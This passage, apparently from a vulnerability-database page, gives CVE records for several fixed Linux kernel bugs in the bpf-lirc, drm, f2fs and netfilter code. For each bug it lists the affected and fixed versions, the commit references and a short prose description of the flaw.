"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "93d8109bf182510629bbefc8cd45296d2393987f",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "d98210108e7b2ff64b332b0a3541c8ad6a0617b0",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "9f6087851ec6dce5b15f694aeaf3e8ec8243224e",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "93136132d1b5792bf44151e3494ae3691cd738e8",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "caf2da1d4562de4e35eedec0be2b7f1ee25d83be",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "6a9d552483d50953320b9d3b57abdee8d436f23f",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/media/rc/bpf-lirc.c",
"drivers/media/rc/lirc_dev.c",
"drivers/media/rc/rc-core-priv.h"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.210",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.79",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.18",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.6",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.210",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.149",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.79",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: rc: bpf attach/detach requires write permission\n\nNote that bpf attach/detach also requires CAP_NET_ADMIN."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:40:41.798Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/93d8109bf182510629bbefc8cd45296d2393987f"
},
{
"url": "https://git.kernel.org/stable/c/d98210108e7b2ff64b332b0a3541c8ad6a0617b0"
},
{
"url": "https://git.kernel.org/stable/c/9f6087851ec6dce5b15f694aeaf3e8ec8243224e"
},
{
"url": "https://git.kernel.org/stable/c/93136132d1b5792bf44151e3494ae3691cd738e8"
},
{
"url": "https://git.kernel.org/stable/c/caf2da1d4562de4e35eedec0be2b7f1ee25d83be"
},
{
"url": "https://git.kernel.org/stable/c/6a9d552483d50953320b9d3b57abdee8d436f23f"
}
],
"title": "media: rc: bpf attach/detach requires write permission",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52642",
"datePublished": "2024-04-17T09:43:45.183Z",
"dateReserved": "2024-03-06T09:52:12.093Z",
"dateUpdated": "2025-05-04T07:40:41.798Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52486 (GCVE-0-2023-52486)
Vulnerability from cvelistv5
Published
2024-02-29 15:52
Modified
2025-05-04 07:37
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
drm: Don't unref the same fb many times by mistake due to deadlock handling
If we get a deadlock after the fb lookup in drm_mode_page_flip_ioctl()
we proceed to unref the fb and then retry the whole thing from the top.
But we forget to reset the fb pointer back to NULL, and so if we then
get another error during the retry, before the fb lookup, we proceed
the unref the same fb again without having gotten another reference.
The end result is that the fb will (eventually) end up being freed
while it's still in use.
Reset fb to NULL once we've unreffed it to avoid doing it again
until we've done another fb lookup.
This turned out to be pretty easy to hit on a DG2 when doing async
flips (and CONFIG_DEBUG_WW_MUTEX_SLOWPATH=y). The first symptom I
saw that drm_closefb() simply got stuck in a busy loop while walking
the framebuffer list. Fortunately I was able to convince it to oops
instead, and from there it was easier to track down the culprit.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52486",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-21T16:18:14.689026Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-21T16:18:24.400Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T23:03:20.411Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/376e21a9e4c2c63ee5d8d3aa74be5082c3882229"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9dd334a8245011ace45e53298175c7b659edb3e7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f55261469be87c55df13db76dc945f6bcd825105"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b4af63da9d94986c529d74499fdfe44289acd551"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/62f2e79cf9f4f47cc9dea9cebdf58d9f7b5695e0"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d7afdf360f4ac142832b098b4de974e867cc063c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/bfd0feb1b109cb63b87fdcd00122603787c75a1a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/cb4daf271302d71a6b9a7c01bd0b6d76febd8f0c"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/drm_plane.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "376e21a9e4c2c63ee5d8d3aa74be5082c3882229",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "9dd334a8245011ace45e53298175c7b659edb3e7",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "f55261469be87c55df13db76dc945f6bcd825105",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "b4af63da9d94986c529d74499fdfe44289acd551",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "62f2e79cf9f4f47cc9dea9cebdf58d9f7b5695e0",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "d7afdf360f4ac142832b098b4de974e867cc063c",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "bfd0feb1b109cb63b87fdcd00122603787c75a1a",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "cb4daf271302d71a6b9a7c01bd0b6d76febd8f0c",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/drm_plane.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.307",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.269",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.210",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.76",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.15",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.307",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.269",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.210",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.149",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.76",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm: Don\u0027t unref the same fb many times by mistake due to deadlock handling\n\nIf we get a deadlock after the fb lookup in drm_mode_page_flip_ioctl()\nwe proceed to unref the fb and then retry the whole thing from the top.\nBut we forget to reset the fb pointer back to NULL, and so if we then\nget another error during the retry, before the fb lookup, we proceed\nthe unref the same fb again without having gotten another reference.\nThe end result is that the fb will (eventually) end up being freed\nwhile it\u0027s still in use.\n\nReset fb to NULL once we\u0027ve unreffed it to avoid doing it again\nuntil we\u0027ve done another fb lookup.\n\nThis turned out to be pretty easy to hit on a DG2 when doing async\nflips (and CONFIG_DEBUG_WW_MUTEX_SLOWPATH=y). The first symptom I\nsaw that drm_closefb() simply got stuck in a busy loop while walking\nthe framebuffer list. Fortunately I was able to convince it to oops\ninstead, and from there it was easier to track down the culprit."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:37:42.728Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/376e21a9e4c2c63ee5d8d3aa74be5082c3882229"
},
{
"url": "https://git.kernel.org/stable/c/9dd334a8245011ace45e53298175c7b659edb3e7"
},
{
"url": "https://git.kernel.org/stable/c/f55261469be87c55df13db76dc945f6bcd825105"
},
{
"url": "https://git.kernel.org/stable/c/b4af63da9d94986c529d74499fdfe44289acd551"
},
{
"url": "https://git.kernel.org/stable/c/62f2e79cf9f4f47cc9dea9cebdf58d9f7b5695e0"
},
{
"url": "https://git.kernel.org/stable/c/d7afdf360f4ac142832b098b4de974e867cc063c"
},
{
"url": "https://git.kernel.org/stable/c/bfd0feb1b109cb63b87fdcd00122603787c75a1a"
},
{
"url": "https://git.kernel.org/stable/c/cb4daf271302d71a6b9a7c01bd0b6d76febd8f0c"
}
],
"title": "drm: Don\u0027t unref the same fb many times by mistake due to deadlock handling",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52486",
"datePublished": "2024-02-29T15:52:06.888Z",
"dateReserved": "2024-02-20T12:30:33.301Z",
"dateUpdated": "2025-05-04T07:37:42.728Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52436 (GCVE-0-2023-52436)
Vulnerability from cvelistv5
Published
2024-02-20 18:34
Modified
2025-07-11 17:19
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
f2fs: explicitly null-terminate the xattr list
When setting an xattr, explicitly null-terminate the xattr list. This
eliminates the fragile assumption that the unused xattr space is always
zeroed.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 98e4da8ca301e062d79ae168c67e56f3c3de3ce4 Version: 98e4da8ca301e062d79ae168c67e56f3c3de3ce4 Version: 98e4da8ca301e062d79ae168c67e56f3c3de3ce4 Version: 98e4da8ca301e062d79ae168c67e56f3c3de3ce4 Version: 98e4da8ca301e062d79ae168c67e56f3c3de3ce4 Version: 98e4da8ca301e062d79ae168c67e56f3c3de3ce4 Version: 98e4da8ca301e062d79ae168c67e56f3c3de3ce4 Version: 98e4da8ca301e062d79ae168c67e56f3c3de3ce4 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52436",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-02-21T20:39:15.806517Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:23:01.871Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T22:55:41.676Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/16ae3132ff7746894894927c1892493693b89135"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/12cf91e23b126718a96b914f949f2cdfeadc7b2a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3e47740091b05ac8d7836a33afd8646b6863ca52"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/32a6cfc67675ee96fe107aeed5af9776fec63f11"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5de9e9dd1828db9b8b962f7ca42548bd596deb8a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2525d1ba225b5c167162fa344013c408e8b4de36"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f6c30bfe5a49bc38cae985083a11016800708fea"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e26b6d39270f5eab0087453d9b544189a38c8564"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00016.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/f2fs/xattr.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "16ae3132ff7746894894927c1892493693b89135",
"status": "affected",
"version": "98e4da8ca301e062d79ae168c67e56f3c3de3ce4",
"versionType": "git"
},
{
"lessThan": "12cf91e23b126718a96b914f949f2cdfeadc7b2a",
"status": "affected",
"version": "98e4da8ca301e062d79ae168c67e56f3c3de3ce4",
"versionType": "git"
},
{
"lessThan": "3e47740091b05ac8d7836a33afd8646b6863ca52",
"status": "affected",
"version": "98e4da8ca301e062d79ae168c67e56f3c3de3ce4",
"versionType": "git"
},
{
"lessThan": "32a6cfc67675ee96fe107aeed5af9776fec63f11",
"status": "affected",
"version": "98e4da8ca301e062d79ae168c67e56f3c3de3ce4",
"versionType": "git"
},
{
"lessThan": "5de9e9dd1828db9b8b962f7ca42548bd596deb8a",
"status": "affected",
"version": "98e4da8ca301e062d79ae168c67e56f3c3de3ce4",
"versionType": "git"
},
{
"lessThan": "2525d1ba225b5c167162fa344013c408e8b4de36",
"status": "affected",
"version": "98e4da8ca301e062d79ae168c67e56f3c3de3ce4",
"versionType": "git"
},
{
"lessThan": "f6c30bfe5a49bc38cae985083a11016800708fea",
"status": "affected",
"version": "98e4da8ca301e062d79ae168c67e56f3c3de3ce4",
"versionType": "git"
},
{
"lessThan": "e26b6d39270f5eab0087453d9b544189a38c8564",
"status": "affected",
"version": "98e4da8ca301e062d79ae168c67e56f3c3de3ce4",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/f2fs/xattr.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.8"
},
{
"lessThan": "3.8",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.306",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.268",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.209",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.148",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.74",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.13",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.1",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.306",
"versionStartIncluding": "3.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.268",
"versionStartIncluding": "3.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.209",
"versionStartIncluding": "3.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.148",
"versionStartIncluding": "3.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.74",
"versionStartIncluding": "3.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.13",
"versionStartIncluding": "3.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.1",
"versionStartIncluding": "3.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "3.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nf2fs: explicitly null-terminate the xattr list\n\nWhen setting an xattr, explicitly null-terminate the xattr list. This\neliminates the fragile assumption that the unused xattr space is always\nzeroed."
}
],
"providerMetadata": {
"dateUpdated": "2025-07-11T17:19:28.135Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/16ae3132ff7746894894927c1892493693b89135"
},
{
"url": "https://git.kernel.org/stable/c/12cf91e23b126718a96b914f949f2cdfeadc7b2a"
},
{
"url": "https://git.kernel.org/stable/c/3e47740091b05ac8d7836a33afd8646b6863ca52"
},
{
"url": "https://git.kernel.org/stable/c/32a6cfc67675ee96fe107aeed5af9776fec63f11"
},
{
"url": "https://git.kernel.org/stable/c/5de9e9dd1828db9b8b962f7ca42548bd596deb8a"
},
{
"url": "https://git.kernel.org/stable/c/2525d1ba225b5c167162fa344013c408e8b4de36"
},
{
"url": "https://git.kernel.org/stable/c/f6c30bfe5a49bc38cae985083a11016800708fea"
},
{
"url": "https://git.kernel.org/stable/c/e26b6d39270f5eab0087453d9b544189a38c8564"
}
],
"title": "f2fs: explicitly null-terminate the xattr list",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52436",
"datePublished": "2024-02-20T18:34:47.387Z",
"dateReserved": "2024-02-20T12:30:33.290Z",
"dateUpdated": "2025-07-11T17:19:28.135Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-0607 (GCVE-0-2024-0607)
Vulnerability from cvelistv5
Published
2024-01-18 15:41
Modified
2025-11-20 18:09
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- CWE-229 - Improper Handling of Values
Summary
A flaw was found in the Netfilter subsystem in the Linux kernel. The issue is in the nft_byteorder_eval() function, where the code iterates through a loop and writes to the `dst` array. On each iteration, 8 bytes are written, but `dst` is an array of u32, so each element only has space for 4 bytes. That means every iteration overwrites part of the previous element corrupting this array of u32. This flaw allows a local user to cause a denial of service or potentially break NetFilter functionality.
References
| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
Impacted products
| Vendor | Product | Version | |||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
Version: 0 ≤ |
|||||||||||||||||||||||||||||||||||||||
|
|||||||||||||||||||||||||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-01T18:11:35.646Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"vdb-entry",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/security/cve/CVE-2024-0607"
},
{
"name": "RHBZ#2258635",
"tags": [
"issue-tracking",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2258635"
},
{
"tags": [
"x_transferred"
],
"url": "https://github.com/torvalds/linux/commit/c301f0981fdd3fd1ffac6836b423c4d7a8e0eb63"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-0607",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-05-08T15:53:37.921736Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-06-02T15:03:44.436Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"collectionURL": "https://git.kernel.org/pub/scm/linux/kernel",
"defaultStatus": "unaffected",
"packageName": "kernel",
"versions": [
{
"lessThan": "6.7-rc2",
"status": "affected",
"version": "0",
"versionType": "semver"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:6"
],
"defaultStatus": "unaffected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 6",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:7"
],
"defaultStatus": "unaffected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 7",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:7"
],
"defaultStatus": "unaffected",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 7",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:8"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 8",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:8"
],
"defaultStatus": "affected",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 8",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:9"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 9",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:9"
],
"defaultStatus": "affected",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 9",
"vendor": "Red Hat"
}
],
"datePublic": "2024-01-16T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "A flaw was found in the Netfilter subsystem in the Linux kernel. The issue is in the nft_byteorder_eval() function, where the code iterates through a loop and writes to the `dst` array. On each iteration, 8 bytes are written, but `dst` is an array of u32, so each element only has space for 4 bytes. That means every iteration overwrites part of the previous element corrupting this array of u32. This flaw allows a local user to cause a denial of service or potentially break NetFilter functionality."
}
],
"metrics": [
{
"other": {
"content": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"value": "Moderate"
},
"type": "Red Hat severity rating"
}
},
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 6.6,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
